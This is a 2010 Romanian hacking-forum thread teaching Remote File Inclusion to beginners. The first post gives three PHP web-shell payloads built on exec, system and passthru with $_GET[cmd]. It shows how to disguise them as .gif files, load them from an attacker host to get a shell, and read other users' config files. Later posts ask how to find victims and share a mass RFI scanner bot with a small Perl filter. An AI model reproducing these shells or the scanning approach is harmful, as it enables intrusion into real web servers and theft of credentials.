curiosul Posted February 14, 2010 Report Posted February 14, 2010 Tehnica destul de celebra (RFI) , permite includerea mai multor arhive in alte servere ; majoritatea vulnerabilitatilor de genul asta se gasesc in coduri cum ar fi :<?include"$page";?>Asta ar fi exploatat in modul urmator :vuln.php?page=http//[atacant]Normal ar fi sa trimitem la o pagina care sa poata executa comenzile.Arhiva poate contine :<?exec($_GET[cmd],$iesire);foreach($iesire as $line) { echo "$line<br>"; }?>exec();<?system($_GET[cmd],$iesire);foreach($iesire as $line) { echo "$line<br>"; }?>system();<?passthru($_GET[cmd],$salida);foreach($salida as $line) { echo "$line<br>"; }?>passthru();Odata ce aveti arhiva cu codul , puneti o extensie .jpg sau .gif. Uploadati pe serverul victima , si totul este pregatit . Acum imaginativa ca avem adresa : http://atacant.com/xploitulnostru.gif . In xpl.gif trebuie sa fie unul din cele 3 coduri de mai sus . Fiecare cod din cele 3 foloseste o varianta distincta , pt ca unele servere pot bloca unele dintre ele .Acum faceti un url asa : victima.com: The Leading Personal Injury Site on the NetSi asta executa xploitul vostru , si primiti un fel de shell .Ce poti face cu asta ? Mai multe ... poti executa comanda cat de ex , si sa vezi arhive (de configurare de ex) , deasemenea puteti face cat in arhivele altor useri ("cd/home/gheorghe/public_html;") cat si "config.php"sau sa obtineti o lista de arhive ("cd/home/gheorghe/public_html;ls")Tutorialul nu este cine stie ce...este pentru incepatori...Si nu-mi asum responsabilitatea pentru contextul in care folositi tutorialul Quote
DarkIceee Posted February 14, 2010 Report Posted February 14, 2010 Daca vrei sa faci un tutorial fa-l cap coada , cum iei situri vulnerabile ce programe sa folosesti "link" dupa care toate ce ai spus tu , sper sa te ajute in urmatoarele posturi si inreadevar ms pt partea a 2`a din tutorial . Quote
unlocker_bv Posted February 27, 2010 Report Posted February 27, 2010 Cine ma poate ajuta cu o treaba la RFI.Am facut un bot in php care scaneaza vulnerabilitati, ca multe altele facute de multi alti de asemenea. Ce as vrea sa intreb este cum sa scot site-urile care contin "my.leetserver.com" la uname:Cmd`ul imi da toate informatiile: uname , free space, uptime, uid si multe altele.$test = $stie.$bug.$cmd - de exemplu si m-am gandit la asta (sa fac un link filter)sub lnk_filter { my @unik = (); foreach my $url ( @_ ) { my $cr = 0; foreach my $b ( @badwords) { if ($test =~ /$b/) { $cr = 1; } } if ($jelek == 0) { push (@unik, $url); } } return @unik;} si la @badwords sa adaug my.leetserver.com. Ce spuneti baieti? O sa mearga?? Quote